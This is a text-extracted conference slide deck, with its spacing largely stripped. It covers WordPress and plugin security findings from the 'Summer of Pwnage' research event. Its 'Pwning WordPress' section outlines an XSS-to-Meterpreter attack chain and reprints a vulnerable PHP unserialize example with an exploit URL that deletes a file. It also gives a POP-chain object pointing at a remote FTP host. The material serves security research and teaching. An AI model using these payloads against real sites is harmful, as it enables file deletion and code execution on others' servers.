The State of Security of WordPress (plugins) › download › The State of Security of...Summer of...

YorickKoster

Contents

• AboutMe• SummerofPwnage• StateofSecurity• Pwning WordPress

AboutMe

• YorickKoster• Co-FounderSecurifyProactiveSoftwareSecurity/BuildSecurityIn

• ~15yearsdoingsoftwaresecurity• Uncoveredvulnerabilitiesinvariousproducts– InternetExplorer,Office,.NETFramework,AdobeReader,WordPress &more.

SummerofPwnage

SummerofPwnage

• Startedasjoke• UsedGithub tofindObjectInjection

• Wedidn’tknowhowtorunacon(stilldon’t😉 )

SummerofPwnage

• MonthofWordPresshacking• Meetupeveryweek• VMwithWordPress&~1000plugins/themes• Forstudents&peoplewlittleexperience• ~25-30activeparticipants• Resultedin118findings(5Core)

https://www.sumofpwn.nl/advisories.htmlhttps://twitter.com/sumofpwn

SummerofPwnageResults

Cross-SiteScripting66%

Cross-SiteRequestForgery

12% PHPObjectInjection

8%

(Remote)CodeExecution4%

LocalFileInclusion3%

DenialofService3%

AuthenticationBypass2%

Misc

2%

Other14%

SummerofXSS😎


65%

23%

12%

CSRF Pre-auth Privilegeescalation


0

10

20

30

40

50

60

70

80

Fixed Open Nofix

SummerofPwnageMediacoverage

42

SummerofPwnageObservations• Focusonlowhangingfruit• Grepisking• Gettingstufffixedishard• Securityknowledgepluginswritersislow

WordPress(Plugins)

StateofSecurity

WordPress SecurityCore• WordPressisblogsoftwarewithCMSfeatures• Powers~27%ofallwebsites(reportedly)• Focusonwhocaneditwhichcontent– Contentiseitherpublishedornot*–Mediacanbeenumerated*

WordPress SecurityCore• Seemslikethey’velearnedthehardway• Coreisrelativesecure(appeartoknowtheirstuff)– Filtering/validation– Anti-CSRF(nonces)– Automaticupdates🙂

• (Legacy)issues– Nopreparedstatements– SaltedMD5passwords– Loginbruteforce– NotdesignedforCSP

WordPressSecurityPlugins• Vulnerabilitiesinonly~100pluginsof1000popularplugins(10%)

• Keepinmind:– Limited(spare)time– Focusonlowhangingfruit

WordPressSecurityPlugins• SomeAPIsaresecurebydefault– Eg,preventSQLi

• Somearenot– Outputencoding– CSRFprotection

• HighnumberofXSS&CSRFissuesget_post( int|WP_Post|null $post = null, string $output = OBJECT, string $filter = 'raw' )Retrieves post data given a post ID or post object.

function column_default($item, $column_name){

$item = apply_filters('ull-output-data', $item);//unset existing filter and pagination$args = wp_parse_args( parse_url($_SERVER["REQUEST_URI"], PHP_URL_QUERY) );unset($args['filter']);unset($args['paged']);switch($column_name){

case 'id':case 'uid':case 'time':

case 'data':return $item[$column_name];case 'image':

$user = new WP_User( $item['uid'] );$user_email = $user->user_email;return get_avatar( $user_email, 60 );

case 'user_email':return $item[$column_name];

case 'ip':return $item[$column_name];

WordPressSecurityPlugins(XSS)

WordPressSecurityPluginsWe'resorryfortheinconvenience,wewillfixthisrightaway.

Wewillneedtohaveaccesstoyourftpinformationsowecanloginandlookintothis,canyoupleaseprovideuswithlogincredentials?

IsthereareasonaWordPressnonceisn'tsufficientforthissecurityconcern?

Canyou atleast explainmethedamageitcouldcreate?

Canyouhelpmeunderstandwhyjson_encode/json_decode issuperiortousingserialize/unserialize?

[…]iscalledbyaWordpress add_menu_page,intheoryitisWordpress thathasfiltertheinputwhencallingthepage.

WordPressSecuritySummary• WordPressCoreisrelativesecure• Corehasknown(legacy)issues• Lotsofinsecureplugins– DangerousAPIs– Lowsecurityawareness–MostlyXSS&CSRF

Pwning WordPress

Pwning WordPressCross-SiteScripting

Pwning WordPressCross-SiteScripting• InjectXSSpayload• Waitforadmintovisitvulnerablepage• Run2ndstageJavaScriptpayloadto:– modifyPHPfile;– visitPHPfile;– runPHPMeterpreterclient.

Pwning WordPressCross-SiteScripting

Pwning WordPressHardening• Ifyoudon’tneedtheeditor,disableit• Morehardening:

https://codex.wordpress.org/Hardening_WordPress

Pwning WordPressPHPObjectInjection


<?phpclass Example1 {public $cache_file;function __construct() {

// some PHP code...}

function __destruct() {$file = "/var/www/cache/tmp/{$this->cache_file}";if (file_exists($file)) @unlink($file);

}}

// some PHP code...$user_data = unserialize($_GET['data']);// some PHP code...?>

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

OWASPexample

Pwning WordPressPHPObjectInjection• Findtherighttarget• Direct:

– __destruct()– __wakeup()

• Indirect:– __toString()– __call()– __set()– __get()

• Autoloading:– spl_autoload_register()

Pwning WordPressPHPObjectInjection• NoeasyexploitableclassinWordPress• FindthecorrectPOPchain• POPchainpresentedbySamThomas

http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing

• Attackstillworksinlatestversion(4.6.1)• UsesWP_Theme::__toString()asstartpoint


WP_Theme __toString() display() load_textdomain() load_theme_textdomain()

i10n.phpload_textdomain()is_readable()ImportMOfile

Pwning WordPressPHPObjectInjection• Finalobject

WP_Theme Object(

[theme_root:WP_Theme:private] => ftp://anonymous:[email protected][headers:WP_Theme:private] => Array

([Name] => foo[TextDomain] => default

)[stylesheet:WP_Theme:private] => foobar

)

Questions?

[email protected]@yorickkoster /@securifybv

The State of Security of WordPress (plugins) › download › The State of Security of...Summer of...

Documents

Transcript of The State of Security of WordPress (plugins) › download › The State of Security of...Summer of...